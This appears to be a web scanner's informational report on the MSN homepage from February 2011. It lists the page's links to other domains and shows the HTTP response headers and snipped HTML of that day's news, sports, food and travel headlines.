Host:	http://www.msn.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msn.com/?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=W:default&PM=z:1

The response contains the following links to other domains:

http://advertising.microsoft.com/home/home
http://col.stb.s-msn.com/i/15/75CE36E35491941944729E4E3DD3B4.jpg
http://col.stb.s-msn.com/i/1A/B33588768C45394AE4ADCCFB1E4D.jpg
http://col.stb.s-msn.com/i/1D/75EAA794DED488A6A52AA9A752F1A.jpg
http://col.stb.s-msn.com/i/2D/A5FBF3354A43D2DBDD85EBB9057CF.jpg
http://col.stb.s-msn.com/i/5A/C9A55DE861F4E9862286632588A4A0.jpg
http://col.stb.s-msn.com/i/79/80E470CC4631FA297484CCF879787.jpg
http://col.stb.s-msn.com/i/84/3F18F929297FAE181A1AF3203C1CCC.jpg
http://col.stb.s-msn.com/i/91/A7D94DF3BAB3DAC3F8E3C7948CE356.jpg
http://col.stb.s-msn.com/i/A3/17B4BD9174DA6F73A42C03559DEF9.jpg
http://col.stb.s-msn.com/i/A6/4F2BF59A28AA46DA46D6D92CDEA7F.jpg
http://col.stb.s-msn.com/i/C0/1B412813CE8ED95174F5757D306F6E.jpg
http://col.stb.s-msn.com/i/C3/94658D11FBAB4D9E2FACB9C46CC6A.jpg
http://col.stb.s-msn.com/i/C5/4FD98FE0DE863AB3B2C9A56DC2C6.jpg
http://col.stb.s-msn.com/i/CB/527C97B05F67769FE21CE3A79DBDD.jpg
http://col.stb.s-msn.com/i/CF/205FBAD0D95B1AE348A4DA5555109E.jpg
http://col.stb.s-msn.com/i/E0/51E5AB2897EA6DC21456E80E2CB13.jpg
http://col.stb.s-msn.com/i/EA/FE2BC922610ACB90641E4923C57.jpg
http://col.stb.s-msn.com/i/FC/A7F85690870F6EBED2F986A732033.jpg
http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://msn.careerbuilder.com/Article/MSN-1268-Workplace-Issues-10-Worst-Things-to-Say-at-Work/?SiteId=cbmsnjm42083&sc_extcmp=JS_1268_jobmod
http://msn.careerbuilder.com/Article/MSN-1462-Flexwork-Freelance-and-PT-Tips-for-Working-Multiple-Jobs/?SiteId=cbmsnjm41462&sc_extcmp=JS_1462_jobmod
http://msn.careerbuilder.com/Article/MSN-1854-Cover-Letters-Resumes-Honesty-is-the-Best-Policy-in-R..sum..s-and-Interviews/?SiteId=cbmsnjm41854&sc_extcmp=JS_1854_jobmod
http://msn.careerbuilder.com/Article/MSN-2465-Job-Info-and-Trends-Americas-25-fastest-growing-salaries/?SiteId=cbmsnhp42465&sc_extcmp=JS_2465_home1&gt1=23000
http://msn.careerbuilder.com/Article/MSN-2472-Job-Info-and-Trends-Best-bets-for-jobs-in-2011/?SiteId=cbmsnhp42472&sc_extcmp=JS_2472_home1&gt1=23000
http://msn.careerbuilder.com/Article/MSN-2483-Interviewing-What-not-to-wear-to-a-job-interview/?SiteId=cbmsnjm42483&sc_extcmp=JS_2483_jobmod
http://msn.careerbuilder.com/Article/MSN-2485-Workplace-Issues-Pros-and-cons-of-working-for-your-familys-business/?SiteId=cbmsnjm42485&sc_extcmp=JS_2485_jobmod
http://msn.careerbuilder.com/Article/MSN-2488-Leadership-Management-Say-this-not-that-5-ways-to-give-feedback-that-gets-results/?SiteId=cbmsnjm42488&sc_extcmp=JS_2488_jobmod
http://msn.careerbuilder.com/Article/MSN-2497-Job-Info-and-Trends-30-jobs-that-pay-30-an-hour/?SiteId=cbmsnhp42497&sc_extcmp=JS_2497_home1&gt1=23000
http://msn.foxsports.com/collegebasketball/story/Kansas-Jayhawks-Thomas-Robinson-shaken-by-mothers-tragic-death-020111
http://msn.foxsports.com/collegefootball/lists/scout-top-25-team-recruit-rankings
http://msn.foxsports.com/nfl/story/Brett-Keisel-beard-Media-Day-Super-Bowl-XLV-Pittsburgh-Steelers-020111
http://msn.foxsports.com/nfl/story/Steelers-Harrison-Ward-send-message-to-Goodell-NFL-at-Media-Day-020111
http://msn.foxsports.com/nfl/story/Super-Bowl-XLV-Green-Bay-Packers-Pittsburgh-Steelers-to-be-first-no-cheerleaders-020211
http://msn.foxsports.com/nfl/story/Vikings-DE-Everson-Griffen-not-charged-after-alleged-police-crotch-grab-020111
http://msn.foxsports.com/nfl/story/peyton-manning-tiger-woods-powerful-athletes-list-020211
http://msn.foxsports.com/other/story/Newscore-High-school-coach-handcuffed-for-fight-with-school-safety-agent-020211
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://recruiting.scout.com/2/1044322.html
http://static.foxsports.com/content/fscom/img/2011/02/02/020111-NFL-Brett-Keisel-JW_20110202001525363_116_175.JPG
http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9
http://www.bing.com/recipe/search?domain=recipe&type=listing&q=Chocolate+recipes&refineby=Partner:3&gt1=36010
http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNHPT
http://www.bing.com/search?q=Theater+Sorry+for+Adding+Sarah+Palin+Diss+to+%22The+Mikado%22&form=msnhed&gt1=36010
http://www.bing.com/search?q=basement+remodeling+cost+estimator&form=msnhed&gt1=36010
http://www.bing.com/search?q=cameron+diaz+colin+firth&form=msnhed&gt1=36010
http://www.bing.com/search?q=how+to+build+a+mother-in-law+suite&form=msnhed&gt1=36010
http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010
http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010
http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010
http://www.bing.com/search?q=make-ahead+recipes&form=msnhed&gt1=36010
http://www.bing.com/search?q=mexico+complains+about+%27offensive%27+BBC+slurs&form=msnhed&gt1=36010
http://www.bing.com/search?q=stephen+king%27s+the+stand+big+screen&form=msnpop
http://www.bing.com/search?q=true+tales+from+apartment+managers&form=msnhed?GT1=36010
http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msntab1176778&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Resolution%3a+Learn+a+new+sport&cid=msntab1175092&form=TRVCON
http://www.bing.com/travel/content/search?q=San+Francisco's+Chinatown+Feeds+the+Senses&cid=msntab1176852&form=TRVCON
http://www.bing.com/travel/content/search?q=Unusual+Beaches%3a+Boulders+Beach%2c+Cape+Peninsula%2c+South+Africa&cid=msn1176225&FORM=TRVCON
http://www.bing.com/travel/content/search?q=World's+Cheapest+Destinations%3a+India&cid=msntab1138076&form=TRVCON
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643?qpvt=orlando+hotels&q=orlando+hotels&cid=msn_tab&form=trvcon
http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon
http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7?q=Justin+Bieber&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp
http://www.bing.com/videos/watch/video/snl-digital-short-the-creep/17wdw43z0?q=saturday+night+live&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k?from=en-us_msnhp
http://www.bing.com/videos/watch/video/tired-of-winter-groundhog-eyes-early-spring/68yowim?q=Groundhog+Day&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42007
http://www.bing.com/videos/watch/video/toad-for-lunch/pbce70j?q=Chinese+Food&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007
http://www.delish.com/entertaining-ideas/party-ideas/superbowl-party-guy-fieri-0109?gt1=47001
http://www.delish.com/food-fun/quizzes/chicken-dish?gt1=47001
http://www.delish.com/recipes/cooking-recipes/easy-chili?gt1=47001
http://www.delish.com/recipes/cooking-recipes/easy-weeknight-meals?gt1=47001
http://www.slate.com/id/2283412/?GT1=38001
https://careers.microsoft.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:03:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=828II6a37_1229:C~126II4a36_0830:WP10_4|; domain=www.msn.com; expires=Sat, 05-Feb-2011 16:03:22 GMT; path=/
Set-Cookie: expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=msn.com; expires=Wed, 16-Feb-2011 16:03:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
ntCoent-Length: 45878
Content-Length: 45878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNHPT">Wednesday, February 2, 2011</a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/41383377/ns/world_news-mideastn_africa?GT1=43001"><img src="http://col.stb.s-msn.com/i/15/75CE36E35491941944729E4E3DD3B4.jpg" title="Image: A supporter of embattled Egyptian President Hosni Mubarak rides a camel through the melee during a clash with anti-government protesters in Tahrir Square in Cairo (.. Chris Hondros/Getty Images)" width="303" height="211" alt="Image: A supporter of embattled Egyptian President Hosni Mubarak rides a camel through the melee during a clash with anti-government protesters in Tahrir Square in Cairo (.. Chris Hondros/Getty Images)" /></a>
...[SNIP]...
<a href="http://today.msnbc.msn.com/id/41384041?GT1=43001"><img src="http://col.stb.s-msn.com/i/A3/17B4BD9174DA6F73A42C03559DEF9.jpg" title="Image: Ben Hughes holding Punxsutawney Phil after Phil made his annual Groundhog Day prediction on Gobbler's Knob in Punxsutawney, Pa. (.. Jason Cohn/Reuters)" width="303" height="211" alt="Image: Ben Hughes holding Punxsutawney Phil after Phil made his annual Groundhog Day prediction on Gobbler's Knob in Punxsutawney, Pa. (.. Jason Cohn/Reuters)" /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/videos/watch/video/tired-of-winter-groundhog-eyes-early-spring/68yowim?q=Groundhog+Day&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42007">Video: Watch Phil make his prediction</a>
...[SNIP]...
<div><a href="http://msn.careerbuilder.com/Article/MSN-2497-Job-Info-and-Trends-30-jobs-that-pay-30-an-hour/?SiteId=cbmsnhp42497&sc_extcmp=JS_2497_home1&gt1=23000"><img src="http://col.stb.s-msn.com/i/FC/A7F85690870F6EBED2F986A732033.jpg" title=" Image: Fruits & vegetables next to scientist (.. Adam Gault/Getty Images) " width="303" height="211" alt=" Image: Fruits & vegetables next to scientist (.. Adam Gault/Getty Images) " /></a>
...[SNIP]...
<span><a href="http://msn.careerbuilder.com/Article/MSN-2497-Job-Info-and-Trends-30-jobs-that-pay-30-an-hour/?SiteId=cbmsnhp42497&sc_extcmp=JS_2497_home1&gt1=23000">30 Jobs That Will Earn You $30 an Hour </a>
...[SNIP]...
<p>Land one of these positions & a year's work will put you well over the national income average. <a href="http://msn.careerbuilder.com/Article/MSN-2497-Job-Info-and-Trends-30-jobs-that-pay-30-an-hour/?SiteId=cbmsnhp42497&sc_extcmp=JS_2497_home1&gt1=23000">Take a look at our list</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/Article/MSN-2465-Job-Info-and-Trends-Americas-25-fastest-growing-salaries/?SiteId=cbmsnhp42465&sc_extcmp=JS_2465_home1&gt1=23000">America's 20 fastest-growing salaries </a>
...[SNIP]...
<li class="last"><a href="http://msn.careerbuilder.com/Article/MSN-2472-Job-Info-and-Trends-Best-bets-for-jobs-in-2011/?SiteId=cbmsnhp42472&sc_extcmp=JS_2472_home1&gt1=23000">Best professions for finding work this year </a>
...[SNIP]...
<a href="http://realestate.msn.com/slideshow.aspx?cp-documentid=27434033&GT1=35006"><img src="http://col.stb.s-msn.com/i/79/80E470CC4631FA297484CCF879787.jpg" title="Image: Searles Castle in Great Barrington, Mass. (.. William Raveis Real Estate)" width="303" height="211" alt="Image: Searles Castle in Great Barrington, Mass. (.. William Raveis Real Estate)" /></a>
...[SNIP]...
<a href="http://glo.msn.com/style/hot-stuff-6453.gallery?gt1=49006"><img src="http://col.stb.s-msn.com/i/2D/A5FBF3354A43D2DBDD85EBB9057CF.jpg" title="Image: (From left) Aerie boy shorts & bra, Panache bottoms & Calvin Klein slip (.. Aerie; Herroom.com; Net-a-porter.com)" width="303" height="211" alt="Image: (From left) Aerie boy shorts & bra, Panache bottoms & Calvin Klein slip (.. Aerie; Herroom.com; Net-a-porter.com)" /></a>
...[SNIP]...
<li><a href="http://www.slate.com/id/2283412/?GT1=38001">Is your snow shovel killing you?</a>
...[SNIP]...
<a href="http://health.msn.com/health-topics/articlepage.aspx?cp-documentid=100269447&gt1=31036"><img class="landscape" src="http://col.stb.s-msn.com/i/E0/51E5AB2897EA6DC21456E80E2CB13.jpg" title="Image: Man lifting weights at gym (.. James Doberman/Getty Images)" width="303" height="117" alt="Image: Man lifting weights at gym (.. James Doberman/Getty Images)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=Theater+Sorry+for+Adding+Sarah+Palin+Diss+to+%22The+Mikado%22&form=msnhed&gt1=36010">Bing: Theater sorry for Palin diss</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=mexico+complains+about+%27offensive%27+BBC+slurs&form=msnhed&gt1=36010">Find: Mexico upset about BBC slurs</a>
...[SNIP]...
<a href="http://money.msn.com/how-to-invest/default-dyn.aspx?cp-documentid=6783923&GT1=33014"><img class="portrait" src="http://col.stb.s-msn.com/i/C3/94658D11FBAB4D9E2FACB9C46CC6A.jpg" title="Image: Warren Buffett (.. Alex Wong/Getty Images) " width="116" height="175" alt="Image: Warren Buffett (.. Alex Wong/Getty Images) " /></a>
...[SNIP]...
<span class="piped"> | <a href="http://www.bing.com/search?q=true+tales+from+apartment+managers&form=msnhed?GT1=36010">Bing: True tales</a>
...[SNIP]...
<div><a href="http://www.delish.com/recipes/cooking-recipes/easy-chili?gt1=47001"><img class="landscape" src="http://col.stb.s-msn.com/i/CF/205FBAD0D95B1AE348A4DA5555109E.jpg" title="Image: Bowl of chili (.. Kate Sears/Good Housekeeping)" width="303" height="117" alt="Image: Bowl of chili (.. Kate Sears/Good Housekeeping)" /></a></div><div><a href="http://www.delish.com/recipes/cooking-recipes/easy-chili?gt1=47001">12 easy ways to make delicious chili</a>
...[SNIP]...
<p>Chili may be the perfect meal for a winter night. Here are a dozen <a href="http://www.delish.com/recipes/cooking-recipes/easy-chili?gt1=47001">ways to warm your belly</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.delish.com/entertaining-ideas/party-ideas/superbowl-party-guy-fieri-0109?gt1=47001"><img class="landscape" src="http://col.stb.s-msn.com/i/1A/B33588768C45394AE4ADCCFB1E4D.jpg" title="Image: Guy Fieri (Courtesy of Delish) " width="128" height="73" alt="Image: Guy Fieri (Courtesy of Delish)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.delish.com/entertaining-ideas/party-ideas/superbowl-party-guy-fieri-0109?gt1=47001"><strong>
...[SNIP]...
<p>The chef shares his <a href="http://www.delish.com/entertaining-ideas/party-ideas/superbowl-party-guy-fieri-0109?gt1=47001">crowd-pleasing party menu</a>
...[SNIP]...
<li class="ter"><a href="http://www.delish.com/recipes/cooking-recipes/easy-weeknight-meals?gt1=47001">What to cook when you don't feel like cooking</a>
...[SNIP]...
<li class="ter"><a href="http://www.delish.com/food-fun/quizzes/chicken-dish?gt1=47001">Quiz: So you think you know your chicken?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/recipe/search?domain=recipe&type=listing&q=Chocolate+recipes&refineby=Partner:3&gt1=36010">Bing: Chocolate frosting, cakes & more recipes</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=make-ahead+recipes&form=msnhed&gt1=36010">Bing: Great ideas for make-ahead meals</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://msn.foxsports.com/nfl/story/Brett-Keisel-beard-Media-Day-Super-Bowl-XLV-Pittsburgh-Steelers-020111"><img class="portrait" src="http://static.foxsports.com/content/fscom/img/2011/02/02/020111-NFL-Brett-Keisel-JW_20110202001525363_116_175.JPG" width="116" height="175" alt="Image: Brett Keisel of the Pittsburgh Steelers (.. David J. Phillip/Associated Press)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://msn.foxsports.com/nfl/story/Brett-Keisel-beard-Media-Day-Super-Bowl-XLV-Pittsburgh-Steelers-020111">Steelers star's beard earns celebrity status</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/2/1044322.html">College football Signing Day updates</a><span class="piped"> | <a href="http://msn.foxsports.com/collegefootball/lists/scout-top-25-team-recruit-rankings">Top teams</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Super-Bowl-XLV-Green-Bay-Packers-Pittsburgh-Steelers-to-be-first-no-cheerleaders-020211">Can we watch a Super Bowl without cheerleaders?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/other/story/Newscore-High-school-coach-handcuffed-for-fight-with-school-safety-agent-020211">Report: Prep coach handcuffed in school scuffle</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/peyton-manning-tiger-woods-powerful-athletes-list-020211">Who passed Tiger as the most powerful athlete?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/collegebasketball/story/Kansas-Jayhawks-Thomas-Robinson-shaken-by-mothers-tragic-death-020111">Hoops player matures after mom, grandparents die</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Steelers-Harrison-Ward-send-message-to-Goodell-NFL-at-Media-Day-020111">Steelers rip NFL commish, league at Media Day</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Vikings-DE-Everson-Griffen-not-charged-after-alleged-police-crotch-grab-020111">NFL DE not charged for alleged police crotch grab</a>
...[SNIP]...
<a href="http://realestate.msn.com/article.aspx?cp-documentid=27304458&GT1=35006"><img class="portrait" src="http://col.stb.s-msn.com/i/91/A7D94DF3BAB3DAC3F8E3C7948CE356.jpg" title="Image: Rental sign in window (.. Dana Hoff/Beateworks/Corbis)" width="116" height="175" alt="Image: Rental sign in window (.. Dana Hoff/Beateworks/Corbis)" /></a>
...[SNIP]...
<a href="http://realestate.msn.com/article.aspx?cp-documentid=27204749&GT1=35009"><img class="landscape" src="http://col.stb.s-msn.com/i/EA/FE2BC922610ACB90641E4923C57.jpg" title="Image: House covered in snow (.. Bill Truslow/Getty Images)" width="128" height="73" alt="Image: House covered in snow (.. Bill Truslow/Getty Images)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+build+a+mother-in-law+suite&form=msnhed&gt1=36010">Bing: Tips for building a mother-in-law suite</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=basement+remodeling+cost+estimator&form=msnhed&gt1=36010">Bing: Basement remodel cost estimator</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7?q=Justin+Bieber&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/C0/1B412813CE8ED95174F5757D306F6E.jpg" title="Image: Video still of Justin Bieber & Jay Mohr on 'The Tonight Show with Jay Leno' (.. NBC)" width="303" height="117" alt="Image: Video still of Justin Bieber & Jay Mohr on 'The Tonight Show with Jay Leno' (.. NBC)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7?q=Justin+Bieber&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Comic tries to impress Justin Bieber</a>
...[SNIP]...
<p>Video: Actor Jay Mohr talks to Jay Leno about having Bieber Fever & <a href="http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7?q=Justin+Bieber&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">shows Justin his break-dance moves</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/toad-for-lunch/pbce70j?q=Chinese+Food&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/4F2BF59A28AA46DA46D6D92CDEA7F.jpg" title="Image: Video still of Karl trying to eat toad on 'An Idiot Abroad' (.. Science Channel)" width="128" height="73" alt="Image: Video still of Karl trying to eat toad on 'An Idiot Abroad' (.. Science Channel)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/toad-for-lunch/pbce70j?q=Chinese+Food&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><strong>
...[SNIP]...
<p>Video: On Science Channel's 'An Idiot Abroad,' Karl is <a href="http://www.bing.com/videos/watch/video/toad-for-lunch/pbce70j?q=Chinese+Food&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">force-fed a meal that won't go down</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/snl-digital-short-the-creep/17wdw43z0?q=saturday+night+live&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/84/3F18F929297FAE181A1AF3203C1CCC.jpg" title="Image: Video still of 'The Creep' on 'Saturday Night Live' (.. NBC)" width="128" height="73" alt="Image: Video still of 'The Creep' on 'Saturday Night Live' (.. NBC)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/snl-digital-short-the-creep/17wdw43z0?q=saturday+night+live&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><strong>
...[SNIP]...
<p>Video: Comedians perform a new dance going around that's sure to <a href="http://www.bing.com/videos/watch/video/snl-digital-short-the-creep/17wdw43z0?q=saturday+night+live&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">catch on in the clubs</a>
...[SNIP]...
<a href="http://movies.msn.com/paralleluniverse/pirates-of-the-carribean-on-stranger-tides/photo-gallery/stills/"><img class="landscape" src="http://col.stb.s-msn.com/i/CB/527C97B05F67769FE21CE3A79DBDD.jpg" title="Image: Johnny Depp in 'Pirates of the Caribbean: On Stranger Tides' (.. Disney)" width="128" height="73" alt="Image: Johnny Depp in 'Pirates of the Caribbean: On Stranger Tides' (.. Disney)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=cameron+diaz+colin+firth&form=msnhed&gt1=36010">Bing: Cameron Diaz joins Colin Firth for 'Gambit'</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=stephen+king%27s+the+stand+big+screen&form=msnpop">Bing: Stephen King opus headed to the big screen</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k?from=en-us_msnhp">Watch an exclusive clip from 'The Roommate'</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp">Watch the first two minutes of 'Rio'</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://msn.careerbuilder.com/Article/MSN-2483-Interviewing-What-not-to-wear-to-a-job-interview/?SiteId=cbmsnjm42483&sc_extcmp=JS_2483_jobmod"><img class="landscape" src="http://col.stb.s-msn.com/i/C5/4FD98FE0DE863AB3B2C9A56DC2C6.jpg" title="Image: Businessman wearing red socks (.. Flying Colours Ltd/Getty Images)" width="128" height="73" alt="Image: Businessman wearing red socks (.. Flying Colours Ltd/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://msn.careerbuilder.com/Article/MSN-2483-Interviewing-What-not-to-wear-to-a-job-interview/?SiteId=cbmsnjm42483&sc_extcmp=JS_2483_jobmod"><strong>
...[SNIP]...
<p>You probably should <a href="http://msn.careerbuilder.com/Article/MSN-2483-Interviewing-What-not-to-wear-to-a-job-interview/?SiteId=cbmsnjm42483&sc_extcmp=JS_2483_jobmod">avoid the sweatsuit or silly socks</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1268-Workplace-Issues-10-Worst-Things-to-Say-at-Work/?SiteId=cbmsnjm42083&sc_extcmp=JS_1268_jobmod">10 worst things to say at work</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1854-Cover-Letters-Resumes-Honesty-is-the-Best-Policy-in-R..sum..s-and-Interviews/?SiteId=cbmsnjm41854&sc_extcmp=JS_1854_jobmod">Honesty is the best policy in job hunt</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2485-Workplace-Issues-Pros-and-cons-of-working-for-your-familys-business/?SiteId=cbmsnjm42485&sc_extcmp=JS_2485_jobmod">Working for your family's business</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1462-Flexwork-Freelance-and-PT-Tips-for-Working-Multiple-Jobs/?SiteId=cbmsnjm41462&sc_extcmp=JS_1462_jobmod">Tips for working multiple jobs</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2488-Leadership-Management-Say-this-not-that-5-ways-to-give-feedback-that-gets-results/?SiteId=cbmsnjm42488&sc_extcmp=JS_2488_jobmod">5 tips for feedback </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msntab1176778&FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/1D/75EAA794DED488A6A52AA9A752F1A.jpg" title="Image: Artist rendering of Hyperion Wharf, Walt Disney World Resort, Fla. (.. Disney)" width="128" height="73" alt="Image: Artist rendering of Hyperion Wharf, Walt Disney World Resort, Fla. (.. Disney)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msntab1176778&FORM=TRVCON"><strong>
...[SNIP]...
<p>Fun new thrills are on tap in the <a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msntab1176778&FORM=TRVCON">world of Disney</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Cheapest+Destinations%3a+India&cid=msntab1138076&form=TRVCON">15 of the world's cheapest travel destinations</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=San+Francisco's+Chinatown+Feeds+the+Senses&cid=msntab1176852&form=TRVCON">Get a real taste of San Francisco's Chinatown</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Unusual+Beaches%3a+Boulders+Beach%2c+Cape+Peninsula%2c+South+Africa&cid=msn1176225&FORM=TRVCON">Strange & breathtaking beaches around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Resolution%3a+Learn+a+new+sport&cid=msntab1175092&form=TRVCON">Turn your New Year's resolution into a vacation</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon">Begin your hotel search with Bing</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643?qpvt=orlando+hotels&q=orlando+hotels&cid=msn_tab&form=trvcon">Orlando hotel deals</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon">Find great deals for your 2011 travels</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do?cid=msn_tab&form=trvcon">Cheap flights to Las Vegas</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9#">Bing Maps: Discover a new destination</a>
...[SNIP]...
<a href="http://fitbie.msn.com/lose-weight/beat-your-bodys-fat-traps?gt1=50002"><img src="http://col.stb.s-msn.com/i/5A/C9A55DE861F4E9862286632588A4A0.jpg" title="Image: Woman with vegetables & measuring tape (.. Will Selarep/Vetta/Getty Images)" width="75" height="128" alt="Image: Woman with vegetables & measuring tape (.. Will Selarep/Vetta/Getty Images)" /></a>
...[SNIP]...
<a href="http://g.msn.com/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
